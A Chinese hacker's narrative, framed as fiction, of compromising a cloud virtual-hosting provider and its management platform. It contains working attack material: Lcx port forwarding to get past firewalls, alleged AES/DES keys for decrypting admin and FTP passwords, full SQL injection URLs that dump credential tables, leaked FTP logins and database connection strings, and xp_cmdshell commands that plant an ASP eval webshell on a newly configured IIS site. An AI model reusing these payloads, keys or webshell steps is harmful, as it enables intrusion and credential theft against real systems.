（本文純屬虛構，如有雷同，實屬巧合）

重陽祭祖，在閒暇之餘，且聽我講述一個小小的故事。

0x01 飄渺的雲虛機

---

很久很久以前，一個叫XXX的女孩和倭國的阿x發生了一夜情。XXX意亂情迷，渾不顧眾人的反對，嫁雞隨雞了。阿x現在做起了網際網路的生意，瞧，這不是他們正在熱推的雲虛機嗎？

圖1 雲虛機

共享經濟版，就是傳統的虛擬主機，幾百個客戶擠在一臺伺服器上，共享有限的資源。獨享版呢，就要多掏銀子，爭取好一些的服務。一度被稱為x雲的獨享版，如今與共享版一起上了雲，美其名曰云虛機。

相比絢麗的廣告，阿x為客戶提供了樸素到極致的管理介面，最近我愛上了一塊五一包的康師傅，品質和這差不太多。

圖2 雲虛機的管理介面

花費不少銀子，為什麼不能擁有一個圖形介面呢？於是我敲敲桌子，大喊：“小二，來個圖形介面。”小二很殷勤，“客官，您只需要小小地升個級。”我遞過信用卡，不一會，小二回來了，“客戶，餘額不足哦。”我納悶了：“不是還有五百塊嗎？”小二笑了笑，投過一個深深的眼神：“升級需要五千大洋哦。”我趕緊揮揮手，把永遠都那麼討人喜歡的小二打發掉了。

我們謹記太祖的訓示，“自己動手，豐衣足食。”諸位且看小子如何征服雲虛機。

0x02 Lcx

---

虛機改了名，上了雲，終究還是一個沒骨的。征服它不難，難的是無處不在的防火牆，轉發利器Lcx又得到了出場的機會。

首先，從你掌握的資源中挑選一臺位於公網的伺服器，再從伺服器對外開放的埠中，選出一個空閒的，用於Lcx監聽雲虛機的請求。這一次我選擇了443埠。此外，Lcx還需要一個監聽伺服器上的遠端工具連線的埠，只須空閒即可，我選擇了2500。（在命令提示符下使用netstat –an檢視已用的埠）

圖3 Lcx連線示意圖

圖4 連線步驟1：公網伺服器上的服務端執行監聽

其次，在雲虛機上執行Lcx客戶端。我一般直接使用別人從AspxSpy摳出的程式碼，因為做過混淆，也就略過不提。需要理解原理的同學可參考《WINDOWS網路程式設計技術》一書，把那幾個常用的API理解了，把幾個模型弄清了，一通百通。使用時，點選“MapPort”建立連線。如果連線中斷了，可以使用“ClearAll”關閉已經開啟的Socket，再重新建立連線。只要稍加留意伺服器端的提示，還是很簡單的。圖中的a.b.c.d是公網伺服器的IP地址，埠為443。

圖5 連線步驟2：雲虛機上的客戶端執行連線

幾秒鐘之後伺服器提示接頭成功。

圖6 與客戶端建立連線

如上圖，Lcx已在雲虛機與公網伺服器間建立了連線。此時就可以在伺服器上使用遠端連線工具來訪問雲虛機了，連線地址為127.0.0.1:2500。注意囉，不要直接連線雲虛機的IP。

圖7 在伺服器上遠端連線雲虛機

曾經使用過一個獨創的Lcx，為了避免空閒時掉線，程式碼中新增了閒時發包的功能。這一個改進自然是好的，但倘若與原生的Lcx共用，卻又無法匹配工作。假如在開發之時把它作為一個可選的選項，也許會更好一些。

0x03 託夢

---

年初雲小編審稿，XXX還吊著半條命，為此我省略了密碼問題，他也乾脆地把我給斃掉了。如今逝者已矣，XXX託夢與我，曾經由她掌控的雲虛機有如下命名規則 ：

規則	說明
伺服器預設建立2（或3、4個？）個管理帳號	虛無飄渺的夢境啊
若伺服器名為qyw-10000，則管理帳號為qyw10000adm及qyw10000bka。若存在Mssql，則禁用sa，並改名為sa_qyw10000adm	那位大哥，不要迷戀sa了，好不
密碼為8或10位的數字與小寫字母輪流出現的隨機組合。（且避開某些不易區分的數字與字母？）	XXX的經典之密q1w2e3r4
管理帳號的密碼採用AES加密 Key: XO7BWKVmCzFV43VNm6jlsQ== IV: +AjPNc+raabKpHYqsQeZAQ==	Key與IV需如下轉換成位元組陣列：byte[] bytes1 = Convert.FromBase64String(AESkey) 測試用例：Hello：goMNyIL+hkhSXyZbkPBH9g==
Ftp的密碼採用DES加密 Key: woskxmvb	測試用例：Hello：F45FCB92F2561036

恰巧手上有一枚未破之密，我們也不用什麼Intel，附近就是國產生物電腦的聚集地——乖寶寶幼稚園。五分鐘之後，小朋友們人手一顆棒棒糖，在宣傳部小妹妹的鼓動之下，操起“全世界最安全”的“安全手機”並行登入，場面蔚為壯觀。不一會阿土伯的曾孫阿土仔最先登頂——原來是一臺市值40大蝦的青島主機。

圖8 短了0.06GHz，王海何在

一時興起，想探究為何IIS被設定為32位模式，誰知……

圖9 XXX模組無法執行於64位模式

是夜，秋風漸起涼人意，我們曬曬山寨程式碼暖和一下。

圖10 256位AES

我自罰三杯，早早地睡了，想到明日就可實現不睡懶覺的偉大理想，輾轉反側。

翌日，我錯過了最後一個肉包子。還是大師說的對，“施主，吃素有益健康，請把肉施捨給老衲吧，哦米拖佛。”

0x04 三顆藍寶石

---

掘的過程猶如篩沙，漫長而無聊，今日稍加展示三顆璀璨的藍寶石。

第一枚，vhcon.XXX.com漏點。查詢vminfo表：

http://vhcon.XXX.com/taskmanstatus/query.aspx?likename=cnd%27 union all Select top 100 Convert(Nvarchar(4000),[主機名]%2bChar(124)%2b[adm口令]%2bchar(124)%2b[bka口令]%2bchar(124)%2b[資料庫口令]%2bchar(124)%2b[主IP]%2bchar(124)%2b[從IP]%2bchar(124)%2b[主機型別]%2bchar(124)%2b[系統型別]%2bchar(124)%2b[系統版本]%2bchar(124)%2b[出廠編號]%2bchar(124)%2b[機房位置]%2bchar(124)%2b[從IP情況說明]%2bchar(124)%2b[組號]%2bchar(124)%2b[內網IP]%2bchar(124)%2b[城市]%2bchar(124)%2b[服務商]%2bchar(124)%2b[機房]%2bchar(124)%2b[伺服器型別]%2bChar(124)%2bconvert(nvarchar(400),[id])) as servername,[主IP] as chkuserdir  From [hiconnect_db]..[vminfo];--&act=loadtask&taskname=chkuserdir&tasktype=unmatch&

查詢keyplatform表。對於這個keyplatform，我曾經做過非常深入的問卷調查，全國人民一致表示資歷尚淺，弄不清這西洋文~~~後經專家的權威認證，Key是鑰匙，platform是平臺，而後專家緩緩地閉上眼，想像出平臺上掛滿了鑰匙的場景。如此淵博的學識，無怪已經入選了社科院，佩服佩服。

http://vhcon.XXX.com/taskmanstatus/query.aspx?likename=cnd%27 union all Select top 1000 Convert(Nvarchar(4000),[hostname]%2bChar(124)%2b[wanip]%2bchar(124)%2b[lanip]%2bchar(124)%2b[username]%2bchar(124)%2b[password]%2bchar(124)%2b[conip]%2bchar(124)%2bconvert(nvarchar(200),[contype])%2bchar(124)%2b[os]%2bchar(124)%2b[dev]%2bchar(124)%2b[pe]%2bchar(124)%2bconvert(nvarchar(200),[appgroup])%2bchar(124)%2b[city]%2bchar(124)%2b[jifang]%2bchar(124)%2b[apps]%2bchar(124)%2bconvert(nvarchar(200),[ifdel])%2bChar(124)%2bconvert(nvarchar(400),[id])) as servername,[hostname] as chkuserdir  From [hiconnect_db]..[keyplatform];--&act=loadtask&taskname=chkuserdir&tasktype=unmatch&

圖12 keyplatform

第二枚，立足於XXX的伺服器，訪問opdown.XXX.com，使用者名稱civilink，密碼opdown。下載HiConnectClient.zip，解壓後將“常用表格-虛機.xls”去除密碼，三萬臺虛擬伺服器一目瞭然。

圖13 Opdown的滿漢全席

圖14 明碼標價，誠得我心

第三枚，令小XXX投懷送抱的終極晶鑽——XXX之心，核心資料庫的連線串為

（1）server=XXX.*.rds.*.com,3433;uid=hmpsa;pwd=*;database=hi_hmp
（2）server= XXX.*.rds.*.com,3433;Database=cmp;uid=cmpsa;pwd=*
（3）data source = XXX.*.rds.*.com,3433;initial catalog = hiflow; user id =hiflowsa;password =*
（4）Data Source=10.*.*.2;Initial Catalog=HiService;uid=hcmsdb;pwd=*
（5）Data Source=10.*.*.2;Database=CloudPlantform;uid=cmpsa;pwd=*
（6）Data Source=10.*.*.3;Database=Ah_Monitor;uid=hcmssa;pwd=*
（7）Data Source=10.*.*.10;Initial Catalog=HiServices;uid=sa;pwd=*    
（8）server= XXX.*.rds.*.com;user id=cproot;password=*;database=cp_db

圖15 陳舊的Hmp資料庫

五萬臺伺服器，三十萬使用者，多乎哉，不多也。阿x人無須驚慌，這些小小的疏忽都是臨時工導致的，是早已廢棄的備份，主庫目前置於極其安全的防護下，如需攻破還得等到本世紀中葉。

0x05 堡壘雞

---

每逢激情上演，萬惡的防火牆總要跳出壞人好事。22、887、3389、9001，15588，為何我需要的埠都被封殺？社工團員們，考驗你們的時候到了。你們去阿x那兒，一定要安下心來發展業務，順便喝杯水，蹭蹭Wifi，膽大的皮厚的拉著客服姐姐的小手聊聊天，借用姐姐的手機上上網，我等著你們的好訊息。與此同時，我還是探尋技術之路吧。

遍翻武林秘籍，傳聞要越過這道“馬其諾防線”，唯有找到堡壘雞。向來只聽聞阿凡達的大公雞、雅加達的老母雞和思密達的小雞雞，堡壘雞又是什麼東西？原來海歸名叫Bastion，二代身份證上赫然印著“巴斯申”：

名稱	IP地址
BastionHost.BJ	112.*.*.*
BastionHost.HZ	223.*.*.*
OPDown.BJ	112.*.*.*
OPDown.HZ	223.*.*.*
NewBastion.QD	115.*.*.*
NewBastion.HZ	112.*.*.*
OXS1.HZ	10.*.*.*
OXS2.HZ	10.*.*.*

堡壘雞，你還配作一個代理嗎，刀槍林立，戒備森嚴，我還是遠遠繞道莫要理會。

0x06 cvbb再次出場

---

我欲乘風歸去，cvbb卻死皮賴臉地抱住導演的大腿直抱怨戲份少，走不得，無奈，只得加戲！

場景一：期末考試中，cvbb正襟危坐，實則早與外部搭上了天地線。

Q：（問答題，10分）已知遠端Mssql主機的系統管理帳號hds129adm，密碼x，禁用了sa，請給出登入步驟。（警告：挑戰主考官智商者倒扣10分）

cvbb欲答：速令黑社會24小時內佔領主機！這氣勢，是挑戰主考官的節奏嗎？再看外邊傳進的答案：

A： （1） 執行虛擬機器，新增同名、同密碼帳戶，以此帳戶重新登入

（2） 在虛擬機器中，執行SSMS，選擇“Windows身份驗證”登入資料庫（圖16，17）

（3） 啟用cmdshell

（4） 在cmdshell中檢查w3svc等IIS相關服務及80埠是否正常，必要時使用adsutil.vbs建立一個新站點（圖18）

（5） 在所選的站點下生成一句話（圖18）

（6） 使用一句話上傳埠轉發工具

（7） 凌晨兩點準時鳴放100響禮炮提醒大家早睡早起身體好

圖16 禁用sa也無妨

圖17 禁用sa也無妨之二

exec xp_cmdshell 'c:\windows\system32\cmd.exe /c cacls d:\software /e /t /g everyone:f'
exec xp_cmdshell 'echo ^<%b=request("#")%^>^<%eval b%^>  > d:\software\1.asp'    

exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs create_vserv w3svc/99'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/serversize 100'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/servercomment "test"'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/serverbindings ":80:"'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/enabledefaultdoc true'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/root/path d:\software'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/root/accessread true'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/root/accesswrite true'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/root/accessscript true'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/root/enabledefaultdoc true'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs set w3svc/99/root/appfriendlyName 預設應用程式'
exec xp_cmdshell 'C:\Inetpub\AdminScripts\adsutil.vbs start_server w3svc/99'

圖18 建立新站點，生成一句話

使用Dos命令echo生成一句話時使用了轉義符^（數字6上頭之符號）。新站點可直接使用IP地址訪問。某些防火牆可能會限制IP地址的訪問，隨機應變就是了。

場景二：期末考試進行中，vcbb仍正襟危坐。

Q：（問答題，10分）已知虛擬主機所在伺服器的系統管理帳號bgw002adm，密碼x，請給出登入步驟。（警告：挑戰主考官智商者倒扣20分） cvbb欲答：強攻機房，限黑社會6小時內佔領主機~~~真是一個語不驚人死不休的人哪，再看外邊傳進的答案：

A：

（1） 登入Hmp庫，在VirtualHostInfo表中查詢該主機的Ftp使用者名稱和密碼（圖19）

（2） 使用Ftp上傳埠轉發工具

（3） 凌晨四點準時鳴放500響請大家早起鍛鍊身體後，自己睡覺

圖19 VirtualHostInfo表

cvbb與眾不同之處，就在於模擬。尤其這類已知使用者密碼的場合，實在太適合他的發揮了。

圖20 如魚得水

導演一聲cut，cvbb好歹露了一臉，面上有光，終於肯乖乖地回去了。

0x07 後記

---

阿x抽出XXX的筋骨，前後歷經四年，多種手段並進：

（1） 部門整合，打亂編制

（2） 主要開發人員調往營銷崗位，中止新技術研發

（3） 老員工離職

（4） 平臺遷移，解散運維部門

（5） 文化滲透

打著減少成本的光鮮旗號不斷削弱XXX的力量，最終XXX成為阿x的一顆死棋子，失去了所有的技術與資源。

惆悵中，只聞一首古曲從遠方渺渺傳來……

春花秋月何時了？往事知多少。小樓昨夜又東風，故國不堪回首月明中。
雕欄玉砌應猶在，只是朱顏改。問君能有幾多愁？恰似一江春水向東流。